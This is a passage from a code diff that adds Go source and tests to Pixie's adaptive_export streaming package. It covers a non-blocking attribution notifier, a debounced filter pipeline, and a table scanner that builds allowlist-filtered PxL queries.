timeout) + return Filter{} + } +} + +func TestFilterUpdater_InitialSnapshotIsSeeded(t *testing.T) { + set := activeset.New() + set.Upsert(activeset.Key{Namespace: "n", Pod: "p1"}, time.Now().Add(time.Minute)) + u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + select { + case f := <-ch: + if len(f.Pods) != 1 || f.Pods[0].Pod != "p1" { + t.Fatalf("initial snapshot wrong: %+v", f) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no initial filter") + } +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/integration_test.go b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go new file mode 100644 index 00000000000..40e31870a78 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go @@ -0,0 +1,268 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "strings" + "sync" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// recordingQuerier captures every PxL string + lets the test inject +// a per-call row count. Useful for verifying that the PxL the scanner +// emits actually carries the allowlist the test set up upstream. +type recordingQuerier struct { + mu sync.Mutex + queries []string + rowsFunc func(pxl string) []map[string]any +} + +func (r *recordingQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) { + r.mu.Lock() + r.queries = append(r.queries, pxl) + r.mu.Unlock() + if r.rowsFunc == nil { + return nil, nil + } + return r.rowsFunc(pxl), nil +} + +func (r *recordingQuerier) all() []string { + r.mu.Lock() + defer r.mu.Unlock() + out := make([]string, len(r.queries)) + copy(out, r.queries) + return out +} + +// countingWriter is a SinkWriter that just counts rows landed +// per-table — proxies an integration-grade check without standing +// up a real CH. +type countingWriter struct { + mu sync.Mutex + perTable map[string]int64 + calls atomic.Int64 +} + +func newCountingWriter() *countingWriter { + return &countingWriter{perTable: map[string]int64{}} +} + +func (w *countingWriter) WritePixieRows(_ context.Context, table string, rows []map[string]any) error { + w.mu.Lock() + defer w.mu.Unlock() + w.perTable[table] += int64(len(rows)) + w.calls.Add(1) + return nil +} + +func (w *countingWriter) count(table string) int64 { + w.mu.Lock() + defer w.mu.Unlock() + return w.perTable[table] +} + +// TestIntegration_NotifierToScannerAllowlistFlow — exercises the +// whole rev-3 pipeline minus pixie: +// +// AttributionNotifier.Submit +// → ActiveSet.Upsert +// → FilterUpdater (debounce) +// → TableScanner.buildPxL (allowlist embedded) +// → recordingQuerier (verify PxL contains pod names) +// → BatchWriter (verify rows reach sink) +// +// The whole chain runs against fake pixie + fake sink so we can +// assert on PxL strings + row counts deterministically. +func TestIntegration_NotifierToScannerAllowlistFlow(t *testing.T) { + ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second) + defer cancel() + + // Wire up the chain. + set := activeset.New() + notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 128}) + updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond}) + q := &recordingQuerier{ + rowsFunc: func(pxl string) []map[string]any { + // Return 3 rows iff the allowlist contains "wantpod"; else 0. + if strings.Contains(pxl, "wantpod") { + return []map[string]any{{"a": 1}, {"a": 2}, {"a": 3}} + } + return nil + }, + } + w := newCountingWriter() + writer := NewBatchWriter("pgsql_events", w, WriterConfig{ + BatchEvery: 50 * time.Millisecond, + BatchRows: 1000, + }) + scanner := NewScanner(ScannerConfig{ + Table: "pgsql_events", + RefreshInterval: 30 * time.Millisecond, + QueryTimeout: 500 * time.Millisecond, + }, q, writer, updater.Subscribe()) + + // Spin everything up. + var wg sync.WaitGroup + wg.Add(4) + go func() { defer wg.Done(); notif.Run(ctx) }() + go func() { defer wg.Done(); updater.Run(ctx) }() + go func() { defer wg.Done(); writer.Run(ctx) }() + go func() { defer wg.Done(); scanner.Run(ctx) }() + + // Push two pods through the controller-facing API. + notif.Submit(activeset.Key{Namespace: "n", Pod: "wantpod"}, time.Now().Add(time.Minute)) + notif.Submit(activeset.Key{Namespace: "n", Pod: "other"}, time.Now().Add(time.Minute)) + + // Wait for the writer to land non-zero rows. + deadline := time.Now().Add(2 * time.Second) + for w.count("pgsql_events") == 0 && time.Now().Before(deadline) { + time.Sleep(20 * time.Millisecond) + } + got := w.count("pgsql_events") + if got < 3 { + t.Fatalf("expected ≥3 rows written for pgsql_events, got %d", got) + } + + // Assert the PxL carried BOTH pods. + found := q.all() + if len(found) == 0 { + t.Fatalf("no PxL queries captured") + } + last := found[len(found)-1] + if !strings.Contains(last, "wantpod") || !strings.Contains(last, "other") { + t.Fatalf("last PxL missing one of the pods:\n%s", last) + } + + cancel() + wg.Wait() +} + +// TestIntegration_EmptyActiveSetSkipsAllQueries — when nothing is +// active, the scanner must NOT issue queries at all. +func TestIntegration_EmptyActiveSetSkipsAllQueries(t *testing.T) { + ctx, cancel := context.WithTimeout(context.Background(), 500*time.Millisecond) + defer cancel() + + set := activeset.New() + updater := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond}) + q := &recordingQuerier{rowsFunc: func(string) []map[string]any { return nil }} + w := newCountingWriter() + writer := NewBatchWriter("redis_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond}) + scanner := NewScanner(ScannerConfig{Table: "redis_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe()) + + var wg sync.WaitGroup + wg.Add(3) + go func() { defer wg.Done(); updater.Run(ctx) }() + go func() { defer wg.Done(); writer.Run(ctx) }() + go func() { defer wg.Done(); scanner.Run(ctx) }() + + <-ctx.Done() + wg.Wait() + + if len(q.all()) != 0 { + t.Fatalf("scanner issued %d queries against empty active set; expected 0", len(q.all())) + } +} + +// TestIntegration_PrunePropagatesToScannerAllowlist — when the +// controller's prune fires, the scanner's next PxL must omit the +// pruned pod. +func TestIntegration_PrunePropagatesToScannerAllowlist(t *testing.T) { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + set := activeset.New() + notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 64}) + updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond}) + q := &recordingQuerier{} + w := newCountingWriter() + writer := NewBatchWriter("http_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond}) + scanner := NewScanner(ScannerConfig{Table: "http_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe()) + + var wg sync.WaitGroup + wg.Add(4) + go func() { defer wg.Done(); notif.Run(ctx) }() + go func() { defer wg.Done(); updater.Run(ctx) }() + go func() { defer wg.Done(); writer.Run(ctx) }() + go func() { defer wg.Done(); scanner.Run(ctx) }() + + // Add a SECOND pod so the scanner keeps issuing queries after + // we Remove "soon-pruned" (else it'd just sit in empty-allowlist + // mode and we'd have no way to deterministically witness the + // filter change). + notif.Submit(activeset.Key{Pod: "soon-pruned"}, time.Now().Add(time.Minute)) + notif.Submit(activeset.Key{Pod: "stays"}, time.Now().Add(time.Minute)) + waitForQueryContaining(t, q, "soon-pruned", time.Second) + + preCount := len(q.all()) + notif.SubmitRemove(activeset.Key{Pod: "soon-pruned"}) + + // Event-driven wait: poll until a query AFTER preCount appears + // that does NOT contain the pruned pod. That's the witness that + // the filter update has propagated through notifier → activeset → + // updater (debounce) → scanner. Cap at 2 s. + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) { + all := q.all() + for i := preCount; i < len(all); i++ { + if !strings.Contains(all[i], "soon-pruned") { + // Found the post-prune query without the pod. + // Now also assert that NO query in this post-prune + // window contains the pod (defense against a stale + // in-flight submission landing AFTER the new one). + for j := preCount; j < len(all); j++ { + if strings.Contains(all[j], "soon-pruned") && j > i { + cancel() + wg.Wait() + t.Fatalf("post-prune query at idx %d contains pruned pod after a clean query at idx %d:\n%s", + j, i, all[j]) + } + } + cancel() + wg.Wait() + return + } + } + time.Sleep(20 * time.Millisecond) + } + cancel() + wg.Wait() + t.Fatalf("scanner kept issuing queries containing 'soon-pruned' for 2s after Remove; captured %d queries", + len(q.all())-preCount) +} + +// waitForQueryContaining polls the recorder until a query containing +// `needle` appears OR timeout fires. +func waitForQueryContaining(t *testing.T, q *recordingQuerier, needle string, timeout time.Duration) { + t.Helper() + deadline := time.Now().Add(timeout) + for time.Now().Before(deadline) { + for _, pxl := range q.all() { + if strings.Contains(pxl, needle) { + return + } + } + time.Sleep(10 * time.Millisecond) + } + t.Fatalf("no query containing %q within %v; captured: %v", needle, timeout, q.all()) +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier.go b/src/vizier/services/adaptive_export/internal/streaming/notifier.go new file mode 100644 index 00000000000..2921630a2ab --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/notifier.go @@ -0,0 +1,166 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync/atomic" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// AttributionNotifier decouples the controller's per-event callback +// (controller.handle) from ActiveSet writes. Without this shim, a +// stalled ActiveSet subscriber (e.g. a slow Supervisor under load) +// could back-pressure controller.handle and stall trigger consumption +// — i.e. lose the operator's main invariant: kubescape events are +// processed in time. +// +// Contract: +// - Submit / SubmitRemove NEVER block. They drop on buffer overflow +// and bump DroppedCount. +// - One Run goroutine consumes the buffer and applies to ActiveSet. +// - Filtered (host-pid / empty pod) events are counted separately so +// drops vs filters can be distinguished in metrics. +type AttributionNotifier struct { + set *activeset.ActiveSet + cfg NotifierConfig + in chan notifyEvent + + dropped atomic.Int64 + filtered atomic.Int64 +} + +// NotifierConfig tunes the notifier. Zero → safe defaults. +type NotifierConfig struct { + // BufferSize is the input chan capacity. 0 → 1024 default. + // Larger absorbs longer consumer stalls; smaller fails faster. + // Producer drops the OLDEST event on overflow (we'd rather lose + // stale activations than fresh ones). + BufferSize int +} + +func (c NotifierConfig) defaulted() NotifierConfig { + if c.BufferSize <= 0 { + c.BufferSize = 1024 + } + return c +} + +// notifyEvent is the discriminated-union we send across the buffer. +type notifyEvent struct { + key activeset.Key + tEnd time.Time + remove bool +} + +// NewAttributionNotifier wires a notifier. Call Run(ctx) to start +// the consumer goroutine. +func NewAttributionNotifier(set *activeset.ActiveSet, cfg NotifierConfig) *AttributionNotifier { + c := cfg.defaulted() + return &AttributionNotifier{ + set: set, + cfg: c, + in: make(chan notifyEvent, c.BufferSize), + } +} + +// Submit hands an upsert to the notifier. Never blocks. Drops oldest +// on overflow + bumps DroppedCount. Host-pid (empty Pod) events are +// filtered here so the ActiveSet never sees them. +func (n *AttributionNotifier) Submit(key activeset.Key, tEnd time.Time) { + if key.Pod == "" { + n.filtered.Add(1) + return + } + n.send(notifyEvent{key: key, tEnd: tEnd}) +} + +// SubmitRemove hands a removal. Same non-blocking contract as Submit. +func (n *AttributionNotifier) SubmitRemove(key activeset.Key) { + if key.Pod == "" { + n.filtered.Add(1) + return + } + n.send(notifyEvent{key: key, remove: true}) +} + +// send is the non-blocking enqueue with drop-oldest semantics. +func (n *AttributionNotifier) send(e notifyEvent) { + select { + case n.in <- e: + default: + // Drop the OLDEST event then retry. If retry still fails + // (consumer drained between the two operations and another + // producer raced in), count this submit as dropped. + select { + case <-n.in: + n.dropped.Add(1) + default: + } + select { + case n.in <- e: + default: + n.dropped.Add(1) + } + } +} + +// Run owns one goroutine; drains the buffer until ctx cancellation. +// Best-effort drain on shutdown — anything remaining in the buffer +// after ctx.Done is dropped. +func (n *AttributionNotifier) Run(ctx context.Context) { + for { + select { + case <-ctx.Done(): + return + case e := <-n.in: + if e.remove { + n.set.Remove(e.key) + } else { + n.set.Upsert(e.key, e.tEnd) + } + } + } +} + +// DroppedCount returns the number of events lost to buffer overflow. +// Use this as a backpressure signal — non-zero means the consumer +// can't keep up. +func (n *AttributionNotifier) DroppedCount() int64 { return n.dropped.Load() } + +// FilteredCount returns the number of events filtered (empty pod). +func (n *AttributionNotifier) FilteredCount() int64 { return n.filtered.Load() } + +// SubmitFromController is a tiny convenience wrapper that matches +// the controller.Config.OnAttribution signature exactly, for +// idiomatic wiring in main.go: +// +// ctlCfg.OnAttribution = notifier.SubmitFromController +func (n *AttributionNotifier) SubmitFromController(namespace, pod string, tEnd time.Time) { + n.Submit(activeset.Key{Namespace: namespace, Pod: pod}, tEnd) +} + +// RemoveFromController matches controller.Config.OnPrune signature. +func (n *AttributionNotifier) RemoveFromController(namespace, pod string) { + n.SubmitRemove(activeset.Key{Namespace: namespace, Pod: pod}) +} + +// (Backpressure logging was deliberately not wired internally to +// avoid coupling the notifier to a particular log cadence. Callers +// observe via DroppedCount() and log on their own schedule.) diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go new file mode 100644 index 00000000000..7ae020bab8d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go @@ -0,0 +1,220 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// TestNotifier_NeverBlocksCaller — the synchronous callback path +// (controller.handle → cfg.OnAttribution → activeset.Upsert) must +// not block the caller even when the consuming end is slow. +// +// The current design exposes Upsert as a fast in-mem mutation, but +// once we wire a Notifier between controller and ActiveSet, the +// Notifier MUST guarantee bounded latency on the producer side. +func TestNotifier_CallerReturnsImmediatelyEvenIfConsumerStalls(t *testing.T) { + set := activeset.New() + // Deliberately no ctx / Run here — we want a stalled consumer + // to prove producer never blocks. + + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 32}) + // Start the goroutine but DON'T let it drain — simulate stall + // by NOT calling Run. The producer-side call MUST still return. + // (We never start n.Run here on purpose.) + + start := time.Now() + for i := 0; i < 1000; i++ { + // Submit MORE events than the buffer can hold. + n.Submit(activeset.Key{Pod: "p"}, time.Now().Add(time.Minute)) + } + elapsed := time.Since(start) + if elapsed > 100*time.Millisecond { + t.Fatalf("1000 Submit() calls took %v — producer is blocking on a stalled consumer", elapsed) + } + // Sanity: at least some events were dropped (since we never started Run). + if n.DroppedCount() == 0 { + t.Fatalf("expected DroppedCount > 0 with no consumer, got 0") + } +} + +// TestNotifier_DeliversEventsWhenConsumerKeepsUp — happy path. +// We submit slowly enough vs a generously-sized buffer that the +// consumer trivially keeps up. Tests the basic delivery contract +// without measuring the buffer's drop semantics (that's covered by +// TestNotifier_DroppedCountAccurate). +func TestNotifier_DeliversEventsWhenConsumerKeepsUp(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // Buffer >> burst so no drops are forced; throttle the submit + // loop so the consumer gets scheduled between sends. + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 1024}) + go n.Run(ctx) + + tEnd := time.Now().Add(5 * time.Minute) + for i := 0; i < 50; i++ { + n.Submit(activeset.Key{Pod: "p" + string(rune('a'+(i%26)))}, tEnd) + if i%5 == 0 { + // Yield so the consumer can drain — production callers + // (controller.handle) naturally have inter-event gaps. + time.Sleep(time.Microsecond) + } + } + // Wait until consumer drains. + deadline := time.Now().Add(500 * time.Millisecond) + for set.Size() < 26 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 26 { + t.Fatalf("expected 26 distinct pods, got %d", set.Size()) + } + if n.DroppedCount() != 0 { + t.Fatalf("expected 0 drops with buffer>>burst, got %d", n.DroppedCount()) + } +} + +// TestNotifier_SubmitConcurrentlySafe — the producer path must be +// safe under concurrent callers (controller has only one goroutine +// in handle, but the contract should be conservative). +func TestNotifier_SubmitConcurrentlySafe(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 256}) + go n.Run(ctx) + + var wg sync.WaitGroup + for i := 0; i < 50; i++ { + i := i + wg.Add(1) + go func() { + defer wg.Done() + for j := 0; j < 20; j++ { + n.Submit(activeset.Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute)) + } + }() + } + wg.Wait() + // Allow drain. + deadline := time.Now().Add(500 * time.Millisecond) + for set.Size() < 26 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() == 0 { + t.Fatalf("no pods landed in ActiveSet under concurrent Submit") + } +} + +// TestNotifier_RunStopsOnCtxCancel — must drain + return promptly +// on ctx cancellation. +func TestNotifier_RunStopsOnCtxCancel(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 16}) + done := make(chan struct{}) + go func() { n.Run(ctx); close(done) }() + + cancel() + select { + case <-done: + case <-time.After(500 * time.Millisecond): + t.Fatalf("Run did not return within 500ms of ctx cancel") + } +} + +// TestNotifier_RemoveDeliveredAsRemoval — the Notifier must +// distinguish Upsert vs Remove events. +func TestNotifier_RemoveDeliveredAsRemoval(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4}) + go n.Run(ctx) + + k := activeset.Key{Pod: "p1"} + n.Submit(k, time.Now().Add(time.Minute)) + // drain + deadline := time.Now().Add(300 * time.Millisecond) + for set.Size() == 0 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 1 { + t.Fatalf("upsert didn't land") + } + n.SubmitRemove(k) + deadline = time.Now().Add(300 * time.Millisecond) + for set.Size() == 1 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 0 { + t.Fatalf("remove didn't land") + } +} + +// TestNotifier_DroppedCountAccurate — overflow accounting. +func TestNotifier_DroppedCountAccurate(t *testing.T) { + set := activeset.New() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4}) + // Don't run the consumer. + const submits = 100 + for i := 0; i < submits; i++ { + n.Submit(activeset.Key{Pod: "p"}, time.Now()) + } + if got := n.DroppedCount(); got < int64(submits-4-1) { // allow ±1 slack on buffer count + t.Fatalf("expected ~%d drops, got %d", submits-4, got) + } +} + +// TestNotifier_HostPidEntriesAreFiltered — host-pid events (empty +// Pod) cannot be streamed and must be dropped at the Notifier so the +// ActiveSet never accumulates pod-less rows. +func TestNotifier_HostPidEntriesAreFiltered(t *testing.T) { + set := activeset.New() + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 8}) + go n.Run(ctx) + n.Submit(activeset.Key{Pod: ""}, time.Now().Add(time.Minute)) + n.Submit(activeset.Key{Pod: "real"}, time.Now().Add(time.Minute)) + deadline := time.Now().Add(300 * time.Millisecond) + for set.Size() < 1 && time.Now().Before(deadline) { + time.Sleep(5 * time.Millisecond) + } + if set.Size() != 1 { + t.Fatalf("expected 1 entry (only real), got %d", set.Size()) + } + if n.FilteredCount() < 1 { + t.Fatalf("expected at least 1 filtered, got %d", n.FilteredCount()) + } +} + +// staticAtomicCheck — make sure Stats accessors don't panic on +// a freshly-constructed notifier (no Run yet). +func TestNotifier_StatsOnFreshInstance(t *testing.T) { + set := activeset.New() + n := NewAttributionNotifier(set, NotifierConfig{}) + if n.DroppedCount() != 0 || n.FilteredCount() != 0 { + t.Fatalf("fresh notifier should report zero counters") + } +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner.go b/src/vizier/services/adaptive_export/internal/streaming/scanner.go new file mode 100644 index 00000000000..d77941e886e --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go @@ -0,0 +1,357 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "fmt" + "strconv" + "strings" + "sync/atomic" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" +) + +// Querier executes a PxL string against a vizier and returns the +// resulting flat rows. Same shape as controller.PixieQuerier; kept +// independently here to avoid an import cycle. +type Querier interface { + Query(ctx context.Context, pxl string) ([]map[string]any, error) +} + +// ScannerConfig tunes one TableScanner. +type ScannerConfig struct { + // Table is the pixie observation table this scanner targets + // (e.g. "pgsql_events"). REQUIRED. + Table string + + // QueryWindow is the `start_time` in the emitted PxL, e.g. "-60s". + // Must be longer than RefreshInterval + maximum expected query + // latency, otherwise rows in the gap between consecutive runs + // would be missed. 0 → -60s. + QueryWindow time.Duration + + // RefreshInterval is the floor on time-between-PxL-submissions. + // A filter change can submit sooner; this prevents over-frequent + // submissions when the filter is stable. 0 → 30s. + RefreshInterval time.Duration + + // QueryTimeout bounds one PxL call. 0 → 180s. + QueryTimeout time.Duration + + // BackoffInitial / BackoffMax — exponential backoff on Querier + // errors. 0 → 1s / 30s. + BackoffInitial time.Duration + BackoffMax time.Duration + + // Rec records per-pull read/submitted counts (ADAPTIVE_RECONCILE). + // nil → reconcile.Nop{} in defaulted() (instrument off). + Rec reconcile.Recorder + + // Hostname is stamped on reconcile rows. + Hostname string +} + +func (c ScannerConfig) defaulted() ScannerConfig { + if c.QueryWindow <= 0 { + c.QueryWindow = 60 * time.Second + } + if c.RefreshInterval <= 0 { + c.RefreshInterval = 30 * time.Second + } + if c.QueryTimeout <= 0 { + c.QueryTimeout = 180 * time.Second + } + if c.BackoffInitial <= 0 { + c.BackoffInitial = 1 * time.Second + } + if c.BackoffMax <= 0 { + c.BackoffMax = 30 * time.Second + } + if c.Rec == nil { + c.Rec = reconcile.Nop{} + } + return c +} + +// TableScanner runs ONE PxL submission per refresh cycle for ONE +// pixie table, with a pod allowlist drawn from an upstream Filter +// channel. Output goes to a per-table BatchWriter. +// +// This is the rev-3 replacement for pushPixieRows' per-hash×per-table +// fan-out. Goroutines created: 1 per TableScanner. Concurrency +// against vizier-query-broker: 1 per scanner = N (number of tables). +type TableScanner struct { + cfg ScannerConfig + querier Querier + writer *BatchWriter + filters <-chan Filter + + currentFilter Filter + + queries atomic.Int64 + queryErr atomic.Int64 + rowsIn atomic.Int64 + skipped atomic.Int64 +} + +// NewScanner wires a scanner. filters is the channel returned by +// FilterUpdater.Subscribe. +func NewScanner(cfg ScannerConfig, querier Querier, writer *BatchWriter, filters <-chan Filter) *TableScanner { + return &TableScanner{ + cfg: cfg.defaulted(), + querier: querier, + writer: writer, + filters: filters, + } +} + +// Run owns one goroutine. Loops: +// +// 1. Wait for filter (initial) — block until first one arrives. +// 2. Loop: +// - If filter has no pods AND mode == Allowlist: skip query +// entirely (the whole purpose: empty allowlist = no work). +// - Else: build PxL, query, push rows to writer. +// - Sleep RefreshInterval OR until filter changes. +// 3. Backoff on Querier errors. +func (s *TableScanner) Run(ctx context.Context) { + // 1. Initial filter. + select { + case f, ok := <-s.filters: + if !ok { + return + } + s.currentFilter = f + case <-ctx.Done(): + return + } + + backoff := s.cfg.BackoffInitial + resetBackoff := func() { backoff = s.cfg.BackoffInitial } + bumpBackoff := func() { + backoff *= 2 + if backoff > s.cfg.BackoffMax { + backoff = s.cfg.BackoffMax + } + } + + for { + if ctx.Err() != nil { + return + } + + // Empty allowlist short-circuit: nothing to query. + if s.currentFilter.Mode == FilterModeAllowlist && len(s.currentFilter.Pods) == 0 { + s.skipped.Add(1) + // Diagnostic: an empty allowlist means the ActiveSet has no + // members — i.e. nothing has been steered into this AE yet. + // Logged so an operator can tell "empty ActiveSet → skipping" + // apart from "queried but the broker returned 0 rows" (the + // latter logs "query completed rows=0"). Naturally rate-limited: + // we block on the next filter immediately after. + log.WithFields(log.Fields{ + "table": s.cfg.Table, + "version": s.currentFilter.Version, + }).Info("streaming.TableScanner: empty allowlist (ActiveSet has no steered pods) — skipping query until a filter with pods arrives") + // Wait for either: a new filter arrives, or ctx done. + select { + case <-ctx.Done(): + return + case f, ok := <-s.filters: + if !ok { + return + } + s.currentFilter = f + } + continue + } + + // 2. Build PxL + execute. + pxl := s.buildPxL(s.currentFilter) + winEnd := time.Now() + winStart := winEnd.Add(-s.cfg.QueryWindow) + qctx, cancel := context.WithTimeout(ctx, s.cfg.QueryTimeout) + rows, err := s.querier.Query(qctx, pxl) + cancel() + s.queries.Add(1) + if err != nil { + s.queryErr.Add(1) + s.cfg.Rec.Record(ctx, reconcile.Row{ + TS: winEnd, Mode: "streaming", Table: s.cfg.Table, + WinStart: winStart, WinEnd: winEnd, + ReadCount: 0, WroteCount: 0, WriteErr: err.Error(), + Hostname: s.cfg.Hostname, + }) + log.WithError(err).WithFields(log.Fields{ + "table": s.cfg.Table, + "pods": len(s.currentFilter.Pods), + "mode": s.currentFilter.Mode, + "backoff": backoff, + }).Warn("streaming.TableScanner: query failed; backing off") + // Wait either backoff OR new filter (filter takes precedence). + select { + case <-ctx.Done(): + return + case f, ok := <-s.filters: + if !ok { + return + } + s.currentFilter = f + resetBackoff() + case <-time.After(backoff): + bumpBackoff() + } + continue + } + resetBackoff() + s.rowsIn.Add(int64(len(rows))) + + // 3. Hand off to writer. + submitted := 0 + if len(rows) > 0 { + if s.writer.Submit(rows) { + submitted = len(rows) + } + } + s.cfg.Rec.Record(ctx, reconcile.Row{ + TS: winEnd, Mode: "streaming", Table: s.cfg.Table, + WinStart: winStart, WinEnd: winEnd, + ReadCount: int64(len(rows)), WroteCount: int64(submitted), + Hostname: s.cfg.Hostname, + }) + log.WithFields(log.Fields{ + "table": s.cfg.Table, + "pods": len(s.currentFilter.Pods), + "mode": s.currentFilter.Mode, + "rows": len(rows), + "version": s.currentFilter.Version, + }).Info("streaming.TableScanner: query completed") + + // 4. Sleep until refresh OR filter change. + select { + case <-ctx.Done(): + return + case f, ok := <-s.filters: + if !ok { + return + } + s.currentFilter = f + case <-time.After(s.cfg.RefreshInterval): + } + } +} + +// buildPxL renders the script for one query. +// pxSetMaxRows raises Pixie's per-table result cap (default 10000) via the +// query-broker's `#px:set` query flag, mirroring internal/pxl (queryfor.go / +// compile.go). Without it the streaming/DX arm silently caps each pull at 10k +// rows while the passthrough/ALL arm (which already emits this) does not — which +// would UNDER-count DX and OVERSTATE the DX-vs-ALL volume reduction. Must be the +// first line of the script (before `import px`). +const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n" + +func (s *TableScanner) buildPxL(f Filter) string { + relStart := "-" + strconv.FormatInt(int64(s.cfg.QueryWindow/time.Second), 10) + "s" + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + s.cfg.Table + "', start_time='" + relStart + "')\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + if f.Mode == FilterModeAllowlist && len(f.Pods) > 0 { + // Allowlist clause. PxL syntax exploration (2026-05-17): + // - `or` between equalities → "Expected two arguments to 'or'" + // - `|` between equalities → "Operator '|' not handled" + // - `px.contains(s, p)` → SUBSTRING (not regex) + // - `px.regex_match(p, s)` → RE2 regex match (PxL UDF + // registered in carnot/funcs/builtins/regex_ops.cc) + // → use regex_match with an anchored alternation. + b.WriteString("df = df[px.regex_match('^(") + for i, k := range f.Pods { + if i > 0 { + b.WriteString("|") + } + b.WriteString(escapeRegex(escapePxL(k.Render()))) + } + b.WriteString(")$', df.pod)]\n") + } + // Unfiltered mode: emit ALL pods on this node. The CH writer's + // downstream consumers can filter by joining adaptive_attribution. + b.WriteString("px.display(df, '" + s.cfg.Table + "')\n") + return b.String() +} + +// ScannerStats — small monitoring helper. +type ScannerStats struct { + Queries int64 + Errors int64 + RowsIn int64 + Skipped int64 +} + +func (s *TableScanner) Stats() ScannerStats { + return ScannerStats{ + Queries: s.queries.Load(), + Errors: s.queryErr.Load(), + RowsIn: s.rowsIn.Load(), + Skipped: s.skipped.Load(), + } +} + +var pxlEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +func escapePxL(s string) string { + return pxlEscaper.Replace(s) +} + +// escapeRegex defangs regex metacharacters in pod names. 